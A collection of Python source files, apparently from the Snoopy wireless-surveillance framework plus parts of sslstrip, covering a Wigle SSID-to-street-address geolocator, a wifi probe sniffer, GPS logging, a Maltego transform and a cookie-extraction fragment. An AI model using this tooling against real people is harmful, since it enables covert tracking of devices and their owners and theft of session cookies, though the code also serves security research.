        if p['headers'].has_key('cookie'):
            return p['headers']['cookie']





#!/usr/bin/python
#Simple API to Interact with Wigle and OpenStreetView
# glenn@sensepost.com // 2013
import time
from random import randint
import re
import sys
from collections import deque
import requests
from BeautifulSoup import BeautifulSoup
from pprint import pprint as pp
import math
import socket
import sys
import logging
import os
import urllib2
import httplib2
import urllib
import json
import sys
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.ERROR)

url = {'land':"https://wigle.net/", 'login': "https://www.wigle.net/api/v1/jsonLogin", 'query':"https://wigle.net/gps/gps/main/confirmquery/"}

class Wigle(object):

    def __init__(self,user,passw,email,proxy=''):
        self.user = user
        self.password = passw
        self.proxies = {"http":proxy,"https":proxy}
        self.cookies = None
        self.email = email

        if not self.user or not self.password:
            logging.error("Please supply Wigle credentials!")
            sys.exit()

        if not self.email:
            logging.error("Please supply email address to Wigle for OpenStreetView lookups!")
            sys.exit()

    def login(self):
        """Login to Wigle service, and set cookies"""
        logging.debug("[+] Logging into wigle with %s:%s via proxy '%s'" %(self.user,self.password,self.proxies))
        payload={'credential_0':self.user, 'credential_1':self.password}
        try:
            r = requests.post(url['login'],data=payload,proxies=self.proxies,timeout=10)
        except Exception, requests.exceptions.ConnectionError:
            logging.error('error: Unable to connect to %s' %url['login'])
            return False
        else: 
            if( 'Please login' in r.text or 'auth' not in r.cookies):
                logging.debug("Error logging in with credentials %s:%s." %(self.user,self.password))
                return False
                #return {'result':'fail', 'error':'Unable to login to wigle'}
            else:
                logging.debug("Successfully logged in with credentials %s:%s." %(self.user,self.password))
                cookies=dict(auth=r.cookies['auth'])
                self.cookies = cookies
                return True

    def lookupSSID(self,ssid):
        """Lookup the co-ordinates (Wigle) and address (OpenStreetMaps) of an SSID. Provide a Wigle cookie"""
        assert ssid
        if not self.cookies:
            logging.debug("Cookies not set - have you successfully logged in?")
            return {'error':'Cookie not set - have you succuessfully logged in?'}
        payload={'longrange1': '', 'longrange2': '', 'latrange1': '', 'latrange2':'', 'statecode': '', 'Query': '', 'addresscode': '', 'ssid': ssid.replace("_","\_"), 'lastupdt': '', 'netid': '', 'zipcode':'','variance': ''}

        results =self.__queryWigle(payload)
        if results and 'error' not in results:
            locations=self.__fetch_locations(results,ssid)
            if (locations != None and locations[0]['overflow'] == 0):
                for l in locations:
                    address = self._getAddress(l['lat'],l['long'])
                    retries = 5
                    while not address and retries > 0:
                        print address
                        logging.error("Failed to lookup address, trying again")
                        address = self._getAddress(l['lat'],l['long'])
                        retries-=1
                        time.sleep(0.75)
                    if address:
                        l.update(address)
            return locations
        else:
            return results

    def fetchNearbySSIDs(self,lat='',lng='',radius=500,address=''):
        """Fetch nearby SSIDs from (lat,long) or an address. Radius is 500m by default"""
        assert address or (lat and lng)
        if address:
            logging.info("Fetching co-ordinates for address '%s'" % address)
            url = "http://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false"%address
            try:
                r = requests.get(url,proxies=self.proxies)
            except Exception, requests.exceptions.ConnectionError:
                logging.error('error: Unable to connect to %s' %url)
            else:
                res = json.loads(r.text)
                r = res.get('results')
                if r:
                    if len(r) > 1:
                        logging.warning("Got %d possible GPS co-ordinates for address. Will use the first one ('%s')"%(len(r),r[0]["formatted_address"]))
                    add = r[0]["formatted_address"]
                    logging.debug("Using address '%s'" % add)
                    lat = float(r[0]["geometry"]["location"]["lat"])
                    lng = float(r[0]["geometry"]["location"]["lng"])

        if not lat or not lng:
            logging.error("Unable to determine GPS co-ordinates")
        else:
            lat1,lng1,lat2,lng2 = self.__getSquare(lat,lng,radius)
            lat1 = round(lat1,11) #Wigle nuance
            lat2 = round(lat2,11)
            lng1 = round(lng1,11)
            lng2 = round(lng2,11)
            logging.debug("[-] Looking for SSIDs near by (%s %s)" %(lat,lng))
            payload={'longrange1': lng1, 'longrange2': lng2, 'latrange1': lat1, 'latrange2':lat2, 'statecode': '', 'Query': '', 'addresscode': '', 'ssid': '', 'lastupdt': '', 'netid': '', 'zipcode':'','variance': '0.010'}
            results = self.__queryWigle(payload)
            if results and 'error' not in results:
                ssid_list = self.__fetch_ssids(results)
                keys = ssid_list.keys()
                for key in keys:
                    slat,slng = ssid_list[key][0], ssid_list[key][1]
                    dist_from_point = self._haversine(lat,lng,slat,slng)
                    ssid_list[key] = (slat,slng,dist_from_point)
                return ssid_list
            else:
                return results

    def __fetch_ssids(self,text):
        """Pull out SSIDs from a Wigle result page"""
        soup=BeautifulSoup(text)
        #print soup
        results=soup.findAll("tr", {"class" : "search"})
        ssids={}
        for line in results:
                try:
                        row=line.findAll('td')
                        ssids[row[2].string]=( float(row[12].string), float(row[13].string) )
                except Exception:
                        pass
        return ssids #.keys()

    def __queryWigle(self,payload):
        """Pass a payload to Wigle, and get the response back"""
        if not self.cookies:
            logging.debug("Cookies not set - have you successfully logged in?")
            return {'error':'Cookie not set - have you succuessfully logged in?'}

        try:
            r = requests.post(url['query'],data=payload,proxies=self.proxies,cookies=self.cookies,timeout=10)
            if( r.status_code == 200 and r.text):
                if('too many queries' in r.text):
                    logging.debug("User %s has been shunned" %(self.user))
                    return {'error':'User "%s" has been shunned' %self.user}
                elif('An Error has occurred:' in r.text):
                    logging.debug("An error occured whilst processing Wigle query.")
                    return {'error':'Text response contained "An Error has occurred"'}
                elif('Showing stations' in r.text):
                    # Lines below are useful when debugging failure, e.g. when Wigle changes their HTML
                    #logging.debug("Writing HTML response to /tmp/%s.html" % payload['ssid'] ) #DD
                    #f = open("/tmp/%s.html"%payload['ssid'], 'w') #DD
                    #f.write(r.text) #DD
                    #f.close() #DD
                    return r.text
                else:
                    logging.debug("Unknown error occured")
                    return {'error':'Unknown error occured'}
            else:
                logging.debug("Bad status - %s" %r.status_code)
                return {'error':'Bad HTTP status - %s'%r.status_code}
        except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
            logging.error("Exception - '%s'" %(str(e)))
            return {'error':e}

    def __fetch_locations(self,text,ssid):
        """Parse Wigle page to extract GPS co-ordinates"""
        soup=BeautifulSoup(text)
        results=soup.findAll("tr", {"class" : "search"})
        locations=[]
        overflow=0
        if (len(results)>99 ):
            overflow=1
        for line in results:
            try:
                row=line.findAll('td')
                if( row[2].string.lower() == ssid.lower()):
                    locations.append({'ssid':ssid,'mac':row[1].string, 'last_seen':row[9].string, 'last_update':row[14].string, 'lat':float(row[12].string), 'long':float(row[13].string),'overflow':overflow})
            except Exception:
                pass
        # Sort by last_update
        sorted=False
        while not sorted:
            sorted=True
            for i in range(0,len(locations)-1):
                if( int(locations[i]['last_update']) < int(locations[i+1]['last_update'])):
                    sorted=False
                    locations[i],locations[i+1] = locations[i+1],locations[i]
        # Remove duplicates within proximity of each other, keeping the most recent
        # TODO: Update this to find the great circle average
        remove_distance=5000 #5 kilometres
        tD={}
        for i in range(0,len(locations)-1):
            for j in range(i+1,len(locations)):
                dist=self._haversine(float(locations[i]['lat']),float(locations[i]['long']),float(locations[j]['lat']),float(locations[j]['long']))
                if (dist < remove_distance):
                    #logging.debug(" %d and %d are %d metres apart, thus, DELETION! :P" % (j,dist))
                    tD[j]=1
        tmp=[]
        for i in range(0,len(locations)):
            if (i not in tD):
                tmp.append(locations[i])
        locations=tmp
        if( len(locations) == 0):
            locations.append({'ssid':ssid,'overflow':-1}) #No results, just return the ssid
        return locations        # Return list of locations

    def __getSquare(self,lat, lng, m):
        """Calcuate crude radius around a GPS point. Returns bottom left, and top right co-ordinates for given radius m"""
        offset = 0.00001/1.1132 #http://en.wikipedia.org/wiki/Decimal_degrees
        m = math.sqrt(( m**2)/2 ) #Pythag
        diff = offset * m
        latRange1 = lat - diff
        latRange2 = lat + diff
        longRange1 = lng - diff
        longRange2 = lng + diff
        return(latRange1,longRange1,latRange2,longRange2)

    def _haversine(self, lat1, lon1, lat2, lon2):
        """Calculate distance between points on a sphere"""
        R = 6372.8 # In kilometers
        dLat = math.radians(lat2 - lat1)
        dLon = math.radians(lon2 - lon1)
        lat1 = math.radians(lat1)
        lat2 = math.radians(lat2)

        a = math.sin(dLat / 2) * math.sin(dLat / 2) + math.sin(dLon / 2) * math.sin(dLon / 2) * math.cos(lat1) * math.cos(lat2)
        c = 2 * math.asin(math.sqrt(a))
        return R * c * 1000.0 # In metres

    def _getAddress(self,gps_lat,gps_long):
        """Get street address from GPS coordinates"""
        lookup_url = "http://nominatim.openstreetmap.org/reverse?zoom=18&addressdetails=1&format=json&email=%s&lat=%s&lon=%s" %(self.email,gps_lat,gps_long)
        try:
            req = requests.get(lookup_url)
            if req.status_code == 200 and 'json' in req.headers['content-type']:
                #addj = json.loads(req.text.encode('UTF8'))
                addj = json.loads(req.text.encode('utf-8'))
                longaddress = addj.get('display_name', '')
                compound_address = addj.get('address', {})
                city = compound_address.get('city', '')
                country = compound_address.get('country', '')
                country_code = compound_address.get('country_code', '')
                county = compound_address.get('county', '')
                postcode = compound_address.get('postcode', '')
                housenumber = compound_address.get('house_number', '')
                road = compound_address.get('road', '')
                state = compound_address.get('state', '')
                suburb = compound_address.get('suburb', '')
                shortaddress = "%s %s, %s" %(housenumber, road, city)
                shortaddress = shortaddress.strip()
    
            return {'longaddress':longaddress, 'shortaddress':shortaddress, 'city':city, 'country':country, 'code':country_code, 'county':county, 'postcode':postcode, 'road':road, 'state':state, 'suburb':suburb}
        except Exception,e:
            logging.error("Unable to retrieve address from OpenStreetMap - '%s'" % str(e))
        


if __name__ == "__main__":
    #logging.basicConfig(level=logging.DEBUG)
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--ssid", help="Fetch SSID location.")
    parser.add_argument("-c", "--coords", help="Fetch SSIDs around GPS co-ordaintes (comma separates).")
    parser.add_argument("-a","--address", help="Fetch SSIDs around street address.")
    parser.add_argument("-r","--radius", help="Specificy radius for -c and -a.", default=500,type=int)
    parser.add_argument("-u", "--user", help="Wigle username")
    parser.add_argument("-p", "--password", help="Wigle password")
    parser.add_argument("-e", "--email", help="Your email, for OpenStreetView lookups (be polite, use your real one)")
    parser.add_argument("-x", "--proxy", help="Proxy to use.")
    args = parser.parse_args()

    if not args.ssid and not (args.coords or args.address):
        print "[!] No operation specified! Try --help."
        sys.exit(-1)

    wig = Wigle(args.user,args.password,args.email,args.proxy)
    print "[+] Logging into Wigle..."
    if wig.login():
        if args.ssid:
            print "[+] Looking up address of '%s'..."%args.ssid
            results = wig.lookupSSID(args.ssid)
            if 'error' in results:
                print "Error observed! Failed to lookup!"
                sys.exit(-1)
            if results[0]['overflow']:
                print "[!] Too many results for '%s'"%args.ssid
            else:
                for r in results:
                    print "Address:\t%s" %r['longaddress']
                    print "Co-ordinates:\t(%f, %f)\n" %(r['lat'],r['long'])
        else:
            lat,lng=None,None
            if args.coords:
                lat,lng=args.coords.split(",")
                lat,lng=float(lat),float(lng)
            ssids = wig.fetchNearbySSIDs(address=args.address,lat=lat,lng=lng,radius=args.radius)
            if 'error' in ssids:
                print "Error: '%s'" % ssids['error']
                sys.exit(-1)
            else:
                ssids = sorted(ssids.items(), key=lambda (k,v): v[2])
                for s in ssids:
                    print s
                    ssid = s[0]
                    lat,lng,dist = s[1]
                    print "SSID:\t\t'%s'" % ssid
                    print "Co-ords:\t(%f,%f)" % (lat,lng)
                    print "Distance:\t%f metres\n" % dist

    else:
        logging.error("Failed to login to Wigle")



import sys, os, shutil
from distutils.core import setup, Extension


shutil.copyfile("sslstrip.py", "sslstrip/sslstrip")

setup  (name        = 'sslstrip',
        version     = '0.9',
        description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.',
        author = 'Moxie Marlinspike',
        author_email = 'moxie@thoughtcrime.org',
        url = 'http://www.thoughtcrime.org/software/sslstrip/',
        license = 'GPL',
        packages  = ["sslstrip"],
        package_dir = {'sslstrip' : 'sslstrip/'},
        scripts = ['sslstrip/sslstrip'],
        data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])],
       )

print "Cleaning up..."
try:
    removeall("build/")
    os.rmdir("build/")
except:
    pass

try:
    os.remove("sslstrip/sslstrip")
except:
    pass

def capture(cmd):
    return os.popen(cmd).read().strip()

def removeall(path):
	if not os.path.isdir(path):
		return

	files=os.listdir(path)

	for x in files:
		fullpath=os.path.join(path, x)
		if os.path.isfile(fullpath):
			f=os.remove
			rmgeneric(fullpath, f)
		elif os.path.isdir(fullpath):
			removeall(fullpath)
			f=os.rmdir
			rmgeneric(fullpath, f)

def rmgeneric(path, __func__):
	try:
		__func__(path)
	except OSError, (errno, strerror):
		pass



# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest

class StrippingProxy(HTTPChannel):
    '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
    This is the basic proxy server class, where we get callbacks for GET and POST methods.
    We then proxy these out using HTTP or HTTPS depending on what information we have about
    the (connection, client_address) tuple in our cache.      
    '''

    requestFactory = ClientRequest



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import collections
import glob
import logging
import os
import time
from threading import Thread
import includes.monitor_mode as mm
#import includes.LogManager
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import sniff, Dot11Elt, Dot11ProbeReq, rdpcap, PcapReader
from scapy.error import Scapy_Exception
from collections import deque
import time
from plugins.mods80211.prefilter.prefilter import prefilter
import sys
from includes.fonts import *
#logging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(levelname)s %(filename)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

class Snoop(Thread):
    """
    This plugin handles 802.11 (WiFi) packets. Submodules are loaded from the
    mods80211 directory.  Pass a value for the interface to listen on, default
    being mon0.
    """

    def __init__(self, **kwargs):
        self.sniffErrors = 0    # Number of times scapy has failed
        self.ready_status = False
        self.packet_queue = deque(maxlen=1000000)
        self.packet_buffer_size=10000 #Number of packets to pop to each module from the queue

        # Process arguments passed to module
        self.iface = kwargs.get('iface',None)
        self.enable_monitor_mode = kwargs.get('mon',"False")
        self.bfilter = kwargs.get('filter',"")
        self.hash_macs = kwargs.get('hash',"False")
        self.pcap = kwargs.get('pcap')

        if self.enable_monitor_mode == "False":
            self.enable_monitor_mode = False
        else:
            self.enable_monitor_mode = True

        Thread.__init__(self)
        self.setName('wifi')
        self.STOP_SNIFFING = False

        self.modules = []
        for m in Snoop.get_modules():
            #self.modules.append(__import__(m, fromlist=['Snarf']).Snarf(hash_macs=self.hash_macs))
            self.modules.append(__import__(m, fromlist=['Snarf']).Snarf(**kwargs))

    @staticmethod
    def get_modules():
        return [ "plugins.mods80211." + os.path.basename(f)[:-3]
                 for f in glob.glob("./plugins/mods80211/*.py")
                 if not os.path.basename(f).startswith('__') ]

    @staticmethod
    def get_tables():
        tables = []
        for m in Snoop.get_modules():
            tbls = __import__(m, fromlist=['Snarf']).Snarf()
            tables.extend(tbls.get_tables())
        return tables

    @staticmethod
    def get_parameter_list():
        sub_plugs = ""
        for m in Snoop.get_modules():
            sub_plug = __import__(m, fromlist=['Snarf']).Snarf
            desc =  sub_plug.__doc__
            name = m.split(".")[-1]
            sub_plugs += "\n\t\t\t  *%s - %s" % (name,desc)

        info = {"info" : "This plugin intercepts and processes network traffic. A series of sub-plugins exists within the 'mods' subfolder. Existing sub-plugins are:%s"%sub_plugs,
                "parameter_list" : [("iface=<dev>", "interface to listen on. e.g. -m iface:iface=mon0"),
                                    ("mon=[True|False]","First enable monitor mode on <iface>. e.g. -m wifi:iface=mon0,mon=True. If no <iface> specified, will find first appropriate one."),
                                    ("pcap=<pcapFile>","Read data from a pcap capture file instead of an interface.")
                                    ]
                }
        return info

    def is_ready(self):
        return self.ready_status

    def stop(self):
        self.STOP_SNIFFING = True

    def parse_pcap(self):
        logging.info("Plugin %s%s%s parsing '%s%s%s' capture file. Will output info below as usual..." % (GR,self.name,G,GR,self.pcap,G))
        #data = rdpcap(self.pcap) #Tests indicate this is much slower
        if not os.path.isfile(self.pcap):
            logging.error("No such file %s%s%s! Terminating plugin." % (GR,self.pcap,G))
            exit(-1)
        try:
            r = PcapReader(self.pcap)
        except Exception, e:
            if 'Scapy_Exception' in str(e):
                logging.error("Plugin %s%s%s unable to parse '%s%s%s' capture file. Likely bad format (does not support pcap-ng). Plugin terminating..." % (GR,self.name,G,GR,self.pcap,G))
            else:
                logging.error("Plugin %s%s%s unable to parse '%s%s%s' capture file. Plugin terminating. '%s'" % (GR,self.name,G,GR,self.pcap,G,e))
            self.ready_status = False
            exit(-1)

        self.ready_status = True
        goGo = True
        pCount = 0
        start = int(os.times()[4])
        while goGo:
            try:
                packet = r.next()
                pCount += 1
                self.packeteer(packet)
            except StopIteration:
                goGo = False
        
        end = int(os.times()[4])
        duration = end - start
        time.sleep(3)
        logging.info("Plugin %s%s%s took %s%d%s seconds to parse %s%d%s packets from '%s%s%s'. Plugin terminating..." % (GR,self.name,G,GR,duration,G,GR,pCount,G,GR,self.pcap,G))

    def run(self):
        if self.pcap:
            self.parse_pcap()
        else:

            shownMessage = False
            while not self.STOP_SNIFFING:
                if self.enable_monitor_mode:
                        self.iface=mm.enable_monitor_mode(self.iface)
                        if not self.iface:
                                if not shownMessage:
                                    logging.error("No suitable monitor interface available. Will check every 5 seconds, but not display this message again.")
                                    shownMessage = True
                                time.sleep(5)
                if not self.iface and self.enable_monitor_mode:
                    continue
                if not self.iface:
                    logging.info("No interface specified. Will sniff *all* interfaces.")
                else:
                    logging.info("Starting sniffing on interface '%s'"%self.iface)
                try:
                    self.ready_status = True
                    shownMessage = False
                    sniff(store=0, iface=self.iface, prn=self.packeteer, filter=self.bfilter,
                          stopperTimeout=1, stopper=self.stopperCheck)
                except Exception, e:
                    logging.error(("Scapy exception whilst sniffing. "
                                       "Will back off for 5 seconds, "
                                       "and try restart '%s' plugin") % __name__)
                    logging.error(e)
                    self.sniffErrors+=1
                if self.sniffErrors >3 :
                    logging.error("Restarting module '%s' after 5 failed attempts" %__file__)
                time.sleep(5)

    def stopperCheck(self):
        return self.STOP_SNIFFING

    def packeteer(self, p):
        """In the interest of thread safety, we now do this sequentially."""
        # Give the packet to each module
        #for m in self.modules:
        #    m.proc_packet(p)
        self.packet_queue.append(p)

    def get_data(self):
        #First we pop N packets from the packet queue and pass them to each module
        for i in range(self.packet_buffer_size):
            try:
                packet = self.packet_queue.popleft()
                if prefilter(packet):
                    for m in self.modules:
                        m.proc_packet(packet)
            except IndexError:
                break

        time.sleep(0.2) #Give each module some time to process the packets

        #Then we query each module for any data they may have constructed from the
        #   received packets
        data_to_return = []
        for m in self.modules:
            moduleData = m.get_data()
            if moduleData:
                for data in moduleData:
                    if data:
                        tblname = data[0]
                        vals = data[1]
                        data_to_return.append((tblname, vals))
        return data_to_return


if __name__ == "__main__":
    #with launch_ipdb_on_exception():
    Snoop()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
from sqlalchemy import Float, Numeric, DateTime, String, Integer, Table, MetaData, Column #As required
from threading import Thread
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')
import time
from collections import deque
from random import randint
import datetime
from threading import Thread
from gps import *#gps, WATCH_ENABLE
from math import isnan
import os
from includes.fonts import *
from dateutil import parser

class Snoop(Thread):
    """Gets GPS co-ordinates of drone using gpsd."""
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.data_store = deque(maxlen=1000)
        self.ready = True
        # Process arguments passed to module
        self.freq = int(kwargs.get('freq', 30))
        self.verb = kwargs.get('verbose', 0)
        self.lat = kwargs.get('lat')
        self.long = kwargs.get('long')
        self.port = kwargs.get('port', 2947)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        self.last_lat = 0
        self.last_long = 0
        self.last_alt = 0

        if self.lat or self.long:
            try:
                self.lat = float(self.lat)
                self.long = float(self.long)
                logging.info("Plugin %s%s%s using manual GPS co-ordinates: %s(%0.4f,%0.4f)%s. Will plot every %s%d%s seconds." % (GR,self.fname,G,GR,self.lat,self.long,G,GR,self.freq,G))
            except Exception, e:
                logging.error("Lat and long parameters should both be present, and be numeric.")
                exit(-1)
        else:
            try:
                self.gpsd = gps(mode=WATCH_ENABLE, port=self.port)
            except Exception, e:
                logging.error("Unable to query gpsd daemon: '%s'" % e)
                exit(-1)

    def run(self):
        lastMessage = 0
        gotGoodFixOnce = False
        while self.RUN:
            now = datetime.datetime.now()
            n=float('NaN')
            res = {'alt':n, 'eps':n, 'ept':n, 'epv':n, 'epx':n, 'epy':n, 'lat':n, 'lon':n, 'time':"1970", 'systemTime':now}
            if self.lat and self.long:
                res['lat'] = self.lat
                res['lon'] = self.long
                res['time'] = parser.parse(res['time']).now()
                gotGoodFixOnce = True
                self.data_store.append(res)
                if self.verb > 1:
                     logging.info("Plugin %s%s%s using manual GPS co-ordinates: %s(%0.4f,%0.4f)%s." % (GR,self.fname,G,GR,self.lat,self.long,G))
            else:
                resN = dict(self.gpsd.next())
                if resN and 'lat' in resN and 'lon' in resN:
                    for k in resN:
                        if k in res:
                            res[k] = resN[k]
                    if res['time'] != n:
                        try:
                            res['time'] = parser.parse(res['time']).now()
                        except Exception,e:
                            logging.error(e)
                    self.data_store.append(res)
                    gotGoodFixOnce = True
                    lastMessage = os.times()[4]
                    if self.verb > 0:
                        slat = float("%0.4f" %(res.get('lat')))
                        slong = float("%0.4f" %(res.get('lon')))
                        salt=-1
                        if res.get('alt') != n:
                            salt = int(res.get('alt'))
                        if slat != self.last_lat or slong != self.last_long or abs(salt - self.last_alt) > 2 and self.verb > 0:
                            logging.info("Plugin %s%s%s indicated new GPS position: %s(%s,%s) @ %sm%s" % (GR,self.fname,G,GR,slat,slong,salt,G))
                            self.last_lat, self.last_long, self.last_alt = slat, slong, salt
                else:
                    dt = os.times()[4]
                    if abs( dt - lastMessage) > 30:
                        logging.debug("No good signal on GPS yet... (%s)"%(str(res)))
                        if self.verb > 0:
                            logging.warning("Plugin %s%s%s looking for good GPS fix..." % (GR,self.fname,G) )
                        lastMessage = dt

            if self.freq == 0 and gotGoodFixOnce:
                self.RUN = False

            i = 0
            while self.RUN and i < self.freq+1:
                time.sleep(1)
                i+=1

    def is_ready(self):
        return self.ready

    def stop(self):
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Queries gpsd server for GPS co-ordinates. Ensure the gpsd daemon is running, and on port 2947.",
                "parameter_list" : [ ("freq=<seconds>","Frequency to poll GPS. Set to 0 to get one fix, and end."),
                                     ("lat=<LAT>","Manually set GPS latitude"),
                                     ("long=<LONG>","Manually set GPS longitude"),
                                     ("port=<port>","Port GPSD is running on. Default 2947")
                                    ]
                }
        return info


    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        #e.g of return data - [("tbl_name", [{'var01':99, 'var02':199}]
        rtnData=[]
        while self.data_store:
            rtnData.append(self.data_store.popleft())
        if rtnData:
            return [("gpsd", rtnData)]
        else:
            return []

    @staticmethod
    def get_tables():
        """This function should return a list of table(s)"""

        table = Table('gpsd',MetaData(),
                            Column('systemTime', DateTime, default='' ),
                            Column('time', DateTime, default=''),
                            #Column('lat', Numeric(precision=12,scale=9)),
                            #Column('lon', Numeric(precision=12,scale=9)),
                            Column('lat', Float()),
                            Column('lon', Float()),
                            Column('speed', Float()),
                            Column('alt', Float()),
                            Column('epx', Float()),
                            Column('epy', Float()),
                            Column('sunc', Integer, default=0))
        return [table]

if __name__ == "__main__":
    Snoop().start()



#Doesn't seem to work across devices. When working correctly incorporate into includes/system_info.py

import serial
from smspdu import pdu, gsm0338
import time
import os
from serial.tools import list_ports
import logging

#Define your USB modem's ID here. Check it with lsusb.
usb_id="12d1:140c" #Huawei Technologies

def check_o2_balance():
    """Check o2 balance"""
    ser = serial.Serial(find_device())
    code = "*#10#"
    data="AT+CUSD=1,%s,15" % pdu.pack7bit(code)[1].encode('hex').upper()
    ser.write(data + "\r")
    start = int(os.times()[4])
    while start + 10 > int(os.times()[4]):
        line = ser.readline().replace('"',"")
        if "+CUSD:" in line:
            response = line.split(",")[1]
            result = gsm0338().decode(pdu.unpack7bit(response.decode('hex')))[0]
            result = result[:-1].replace(u'Your balance is \xa3','')
            logging.debug("Balance is %s" %result)
            return float(result)
    return -1

def find_device():
        """Return first instance of matching usb_id"""
        logging.debug("Looking for USB modem")
	usb_devices = list_ports.comports()
	for device in usb_devices:
		id = device[2].split("=")
		if len(id) > 1 and id[1] == usb_id:
                    logging.debug("Found USB modem at %s" % device[0])
	            return device[0]

if __name__ == "__main__":
    print "Balance is %f" % check_o2_balance()



from MaltegoTransform import *
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
import logging
import re
from dateutil import parser
import os
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')
logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO) #Log SQL queries

if not os.path.isdir("/etc/transforms"):
    print "ERROR: '/etc/tranforms' symlink doesn't exist"
    exit(-1)
f = open("/etc/transforms/db_path.conf")
dbms = f.readline().strip()

try:
    db = create_engine(dbms)
#db.echo = True
    metadata = MetaData(db)
    metadata.reflect()
except Exception,e:
    print "ERROR: Unable to communicate with DB specified in /etc/transforms/db_path.txt ('%s'). Error was '%s'" % (dbms,str(e))
    exit(-1)


TRX = MaltegoTransform()
TRX.parseArguments(sys.argv)

start_time = "2000-01-01 00:00:00.0"
end_time = "2037-01-01 00:00:00.0"
drone, location, mac, ssid, domain, observation = (None,)*6

filters = []

sess  = metadata.tables['sessions']

#Hack to know if we're local or TDS
#Option One, TDS (this should be made into the new TRX):
if len(sys.argv) < 2:
    from Maltego import *
    mtk = metadata.tables['mtk']
    users = metadata.tables['users']
    MaltegoXML_in = sys.stdin.read()
    TRX = MaltegoTransform()
    print "Content-type: xml\n\n"
    if MaltegoXML_in <> '':
        m = MaltegoMsg(MaltegoXML_in)

        #This method of extraction feels horrendous. Find a better way.
        drone = m.AdditionalFields.get('properties.drone')
        location = m.AdditionalFields.get('properties.dronelocation')
        start_time = m.AdditionalFields.get('properties.start_time')
        end_time = m.AdditionalFields.get('properties.end_time')
        mac = m.AdditionalFields.get('properties.mac')
        ssid = m.AdditionalFields.get('properties.ssid')
        domain = m.AdditionalFields.get('properties.fqdn')
        observation = m.AdditionalFields.get('properties.observation')
        #shadowKey = m.AdditionalFields.get("properties.ShadowKey")
        shadowKey = m.TransformSettings.get("ShadowKey")
        #In case variables were not properties.*
        if shadowKey is None:
            shadowKey = m.AdditionalFields.get("ShadowKey")
        if drone is None:
            drone = m.AdditionalFields.get('drone')
        if location is None:
            location = m.AdditionalFields.get('location')
        if start_time is None:
            start_time = m.AdditionalFields.get('start_time')
        if end_time is None:
            end_time = m.AdditionalFields.get('end_time')
        if mac is None:
            mac = m.AdditionalFields.get('mac')
        if ssid is None:
            ssid = m.AdditionalFields.get('ssid')
        if domain is None:
            domain = m.AdditionalFields.get('fqdn')
        if observation is None:
            observation = m.AdditionalFields.get('observation')

        #If no start and end times specified fetch all. 
        #It might make more sense to just remove the time filter.
        if start_time is None:
            start_time = "2000-01-01 00:00:00.0"
        if end_time is None:
           end_time = "2037-01-01 00:00:00.0"

        if not shadowKey or shadowKey == ' ':
            TRX.addException("Bad shadow key entered! Please obtain it via your www.ShadowLightly.com account.")
            TRX.throwExceptions()
            exit(0)
        ss = select([mtk.c.mtkey]).where(mtk.c.mtkey == shadowKey)
        r = db.execute(ss).fetchall()
        logging.debug("Key is %s" %shadowKey)
        logging.debug("Query is %s" %str(ss))
        logging.debug("Results of R: %s" %str(r))
        logging.debug( "Length of R: %d" %len(r))
        if len(r) < 1:
            TRX.addException("Bad shadow key entered! Please obtain it via your www.ShadowLightly.com account.")
            TRX.throwExceptions()
            exit(0)
        #loging.error(len(r))

        # The dirtiest hack of dirty hacks.
        if not shadowKey:
            shadowKey = "derpderpderp"
        if shadowKey and str(m.Type) == "snoopy.Snoopy":
            filters.append( mtk.c.mtkey == shadowKey )
            filters.append( mtk.c.user == users.c.user )
            filters.append( sess.c.drone == users.c.drone )

#Option Two, Local:
else:

    drone = TRX.getVar("properties.drone")
    if TRX.getVar("drone"):
        drone = TRX.getVar("drone")
    
    location = TRX.getVar("properties.dronelocation")
    if TRX.getVar("location"):
        location = TRX.getVar("location")
    
    start_time = TRX.getVar("properties.start_time", "2000-01-01 00:00:00.0")
    if TRX.getVar("start_time"):
        start_time = TRX.getVar("start_time", "2000-01-01 00:00:00.0")
    
    end_time = TRX.getVar("properties.end_time", "2037-01-01 00:00:00.0")
    if TRX.getVar("end_time"):
        end_time = TRX.getVar("end_time", "2037-01-01 00:00:00.0")
    
    mac = TRX.getVar("properties.mac")
    if TRX.getVar("mac"):
        mac = TRX.getVar("mac")
    
    ssid = TRX.getVar("properties.ssid")
    if TRX.getVar("ssid"):
        ssid = TRX.getVar("ssid")   #Manually overide
    
    domain = TRX.getVar("fqdn")
    
    
    observation = TRX.getVar("properties.observation")


# Done parsing Maltego input

st_obj = parser.parse(start_time)
et_obj = parser.parse(end_time)

try:
    proxs = metadata.tables['wifi_client_obs']
    vends = metadata.tables['vendors']
    ssids = metadata.tables['wifi_client_ssids']
    wigle = metadata.tables['wigle']
